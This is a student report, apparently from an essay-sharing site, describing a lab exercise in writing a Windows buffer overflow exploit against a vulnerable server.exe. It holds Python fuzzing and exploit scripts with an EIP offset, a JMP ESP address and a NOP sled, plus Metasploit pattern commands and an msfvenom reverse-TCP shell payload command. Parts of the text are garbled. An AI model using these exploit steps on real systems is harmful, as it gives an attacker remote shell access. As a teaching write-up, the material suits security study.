ICT Ethical Hacking: Exploit Development, Vulnerability Analysis

Verified

Added on 2023/06/04

AI Summary

This report provides a detailed overview of exploit development within the context of ICT ethical hacking. It begins with the initiation phase, utilizing the Linux platform and Kali Virtual Machine, and progresses through identifying buffer overflows using Python scripts. The report then delves into weaponizing vulnerabilities, detailing steps such as restarting the server.exe within the Immunity Debugger and using Metasploit tools to match IP addresses. Key processes include determining the offset of EIP and modifying the attack.py file to include shellcode generated using msfvenom. The report concludes with references to relevant literature, highlighting the importance of network security and penetration testing in ethical hacking.

Running head: ICT ETHICAL HACKING
ICT Ethical Hacking
Name of the Student
Name of the University
Author Note

Paraphrase This Document

Need a fresh take? Get an instant paraphrase of this document with our AI Paraphraser

1ICT ETHICAL HACKING
To gain control over a computer system, exploit development is used. This is done during
the findings of bugs and vulnerabilities and taking advantages. Therefore, the process allows
privilege escalations and service denial attacks (Thomas, Burmeister & Low, 2017). The entire
process for the development thus requires several phases, which follows the process in such a
way that the previous phase needs to be completed first in order to process further to the next
one.
Initiation phase: Linux Platform is utilized for the development process entirely. The
Kali Virtual Machine needs to be accessed first following by the Win32 buffer victim Virtual
Machine (Wang & Yang, 2017). During this process, the IP addresses of both the machines are
required to be checked by setting up a NAT networking.
Overflow:
#!/usr/bin/python
import sys
import os
import socket
host = sys.argv[1]
port = int(sys.argv[2])
port = int(sys.argv[2])

2ICT ETHICAL HACKING
# Testing
buffer = "\x41"*500
s = socket.socket(socket.AF_INET,
socket.SOCK_STREAM)
con = s.connect((host, port))
s.send(buffer)
s.close()
The server.exe is opened immediately along with an immediate debugger in the Windows
host. The F9 key then initiates the entire process for execution. Following these, a python file has
been created with the name ‘attack.py’. In this file, python codes have also been attached. Along
with these, the python command “python attack.py IP_ADDRESS 1337” is attached (Sinha,
2017). The IP addresses of the machines have been set alike as the Windows Virtual Machine.
After this process has been executed, it is required that now the Windows environment be
swapped and the shift key and F9 key is to be pressed at the same time to pass the executable
exception.

3ICT ETHICAL HACKING
Now, from the above figure, we can see that the EIP and the EBP contains the required
value. The ESP value generated in the process instructs towards thr memory containing the
injected value.
Weaponizing the vulnerability:
This phase can be described by the pressing of CTRL and F2 key at once and restarting
of the server.exe within the range of the immunity debugger. This was followed by the initiation
of the execution process by pressing F9 (Li et al., 2018). With the process of running the
runningcd /usr/share/metasploit-framework/tools/exploit. Run ./pattern_create.rb -l 5000 |
nc IP_ADDRESS 1337 within Kali, the directory needs to be changed to metasploit. This is how
the IP addressed for both the Windows Virtual Machine and the physical machine are matched.
Then press SHIFT +F9 within Immunity debugger to pass the exception. Run
“./pattern_offset.rb -l 5000 -q 37694136” within Kali to determine the offset of EIP. The code
which will jump to the ESP needs to be determined now. The attack.py modified as follows:
#!/usr/bin/python
import sys

Paraphrase This Document

Need a fresh take? Get an instant paraphrase of this document with our AI Paraphraser

4ICT ETHICAL HACKING
importos
import socket
host = sys.argv[1]
port = int(sys.argv[2])
# EIP is overwritten at 260 bytes
buffer = "\x41"*260
# Overwrite EIP with JMP ESP
buffer += "\x78\x16\xF3\x77"
# NOPSLED
buffer += "\x90"*128
# Shellcode
buffer +=

5ICT ETHICAL HACKING
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
con = s.connect((host, port))
s.send(buffer)
s.close()
Shellcode
1. Enter Kali.
2. Run the command msfvenom -p windows/shell/reverse_tcp LHOST=<KALI_IP> -e
x86/shikata_ga_nai -b '\x00\xff\x0a\x0b\x0d' -i 3 -f python where <KALI_IP> is the IP
address of the Kali virtual machine.
3. Modify the attack.py file to include the generated shellcode.

6ICT ETHICAL HACKING
References
Li, L., Li, Z., Shahriar, H., Rutherfoord, R., Peltsverger, S., & Tatum, D. (2018). Ethical
Hacking: Network Security and Penetration Testing.
Sinha, S. (2017). Python 3 and Ethical Hacking. In Beginning Ethical Hacking with Python (pp.
37-38). Apress, Berkeley, CA.
Thomas, G., Burmeister, O. K., & Low, G. (2017). Issues of Implied Trust in Ethical Hacking.
In Proceedings of The 28th Australasian Conference on Information Systems,
December(pp. 4-6).
Wang, Y., & Yang, J. (2017, March). Ethical Hacking and Network Defense: Choose Your Best
Network Vulnerability Scanning Tool. In Advanced Information Networking and
Applications Workshops (WAINA), 2017 31st International Conference on (pp. 110-113).
IEEE.